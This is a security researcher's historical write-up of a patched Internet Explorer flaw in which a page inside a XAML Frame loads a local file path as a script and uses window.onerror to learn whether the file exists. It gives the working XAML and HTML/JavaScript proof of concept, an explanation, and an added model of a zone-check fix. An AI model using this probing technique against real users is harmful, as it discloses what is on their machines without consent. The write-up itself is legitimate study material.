I was looking at what local file access XAML Frame pages had compared to standard Internet Zone HTML pages. I found that inside a XAML Frame, you could set the src of a <script> element to a local file:// path. Depending on whether the script load triggered an onerror event, you could determine whether the file existed. It is a read-less information disclosure using the error behavior of dynamic script loading.
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
      WindowTitle="xamlFrameClipboardRead">
  <TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
    <Bold>This is a XAML Frame:</Bold>
    <LineBreak /><LineBreak /><LineBreak />
    &lt;<Bold>Frame</Bold> Width="700" Height="600" Source="domain1.html" /&gt;
    <LineBreak /><LineBreak />
    <Frame Width="700" Height="600" Source="ScriptTagCheckIfLocalFileExists.html" />
  </TextBlock>
</Page>
ScriptTagCheckIfLocalFileExists.html (the HTML page loaded inside the XAML Frame):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_ScriptTagCheckIfLocalFileExists</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XAML_ScriptTagCheckIfLocalFileExists</h2>
</center>
If we are inside a Framed XAML, we can load local files via SCRIPT tag.<br /><br />
<hr />
Type a fileName and we will check if it exists or not:<br /><br />
<input type="text" size="50" value="c:\Program Files\Internet Explorer\iexplore.exe" id="fileName"> <input type="button" value="Check if Exists" onclick="setScriptSrc()"><br /><br />
<hr />
<br />
We are changing the source of a SCRIPT and checking if there's an error. If there is, it means the file exists.<br /><br />
<hr />
<font color="blue">
window.onerror = function()<br />
{<br />
FILE_EXISTS = true;<br />
return true;<br />
}<br />
document.scripts[0].src = document.all.fileName.value;<br />
</font>
<hr />
<br /><br />
<script language="JavaScript">
var FILE_EXISTS = false;

// Any script error sets the flag; returning true suppresses the error dialog.
window.onerror = function()
{
    FILE_EXISTS = true;
    return true;
}

function setScriptSrc()
{
    // This little fix is because the first time that we try, it does not throw the error.
    if (!window.firstTimeLoaded)
    {
        document.scripts[0].src = document.all.fileName.value;
        setTimeout("setScriptSrc()",1000);
        window.firstTimeLoaded = true;
        return;
    }

    // Point the existing SCRIPT element at the path, then check the flag shortly after.
    document.scripts[0].src = document.all.fileName.value;
    setTimeout("checkForErrors()",100);
}

function checkForErrors()
{
    if (FILE_EXISTS)
    {
        alert("File Exists!!");
    }
    else
    {
        alert("File not found");
    }
    // Reset the flag for the next check.
    FILE_EXISTS = false;
}
</script>
</font>
</body>
</html>
Inside a XAML Frame, the script engine allowed the src attribute of an existing <script> element to be set to a local file:// path — something the standard Internet Zone would block. When the file exists and is not a valid JavaScript file, the engine attempts to parse it, fails, and fires window.onerror. When the file does not exist at all, no load is attempted and no error fires. The window.onerror handler sets a flag that distinguishes these two outcomes. There’s an interesting quirk in the code: the first attempt doesn’t reliably trigger the error, so the function runs itself twice via setTimeout to get a consistent result.
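The oracle described above, modelled as an added JavaScript example (not the original PoC and not Internet Explorer or WPF code): `framedHost` reproduces the described outcomes, and `zoneCheckedHost` is an assumed fix that refuses local sources for web-served documents before the file system is consulted. All function names, `FAKE_FS` and the document URL used with it are constructed for illustration.

```javascript
// Added model of the behaviour described above; not IE or WPF code.
// CONSTRUCTED file system: the only path that "exists" on the modelled machine.
const FAKE_FS = new Set(['c:\\program files\\internet explorer\\iexplore.exe']);

// Normalise a drive path or file: URL to a lower-case Windows path.
function toLocalPath(src) {
  let s = String(src).trim();
  if (/^file:/i.test(s)) s = decodeURIComponent(new URL(s).pathname).replace(/^\//, '');
  return s.replace(/\//g, '\\').toLowerCase();
}

// A src is local when it is a drive path, a UNC path or resolves to a file: URL.
function isLocalSrc(src, baseUrl) {
  const s = String(src).trim();
  if (/^[a-z]:[\\/]/i.test(s) || s.startsWith('\\\\')) return true;
  try { return new URL(s, baseUrl).protocol === 'file:'; } catch { return false; }
}

// What the page can observe, as the text describes it: an existing non-script
// file fails to parse and fires onerror; a missing file fires nothing.
function attemptLoad(src) {
  return FAKE_FS.has(toLocalPath(src)) ? 'onerror' : 'none';
}

// Host as described: the framed page's local script load is attempted.
function framedHost(docUrl, src) {
  return attemptLoad(src);
}

// Assumed fix: a web-served document is refused a local src before the file
// system is consulted, so existing and missing files look the same.
function zoneCheckedHost(docUrl, src) {
  const docIsWeb = /^https?:$/.test(new URL(docUrl).protocol);
  if (docIsWeb && isLocalSrc(src, docUrl)) return 'none';
  return attemptLoad(src);
}

// A host leaks file existence when the two outcomes can be told apart.
function leaksExistence(host, docUrl, existingPath, missingPath) {
  return host(docUrl, existingPath) !== host(docUrl, missingPath);
}
```

The check has to recognise raw drive-letter paths (the form the PoC's text box uses) as local, not only `file:` URLs, and the refusal has to happen before any file access so that both cases produce the same event.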
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.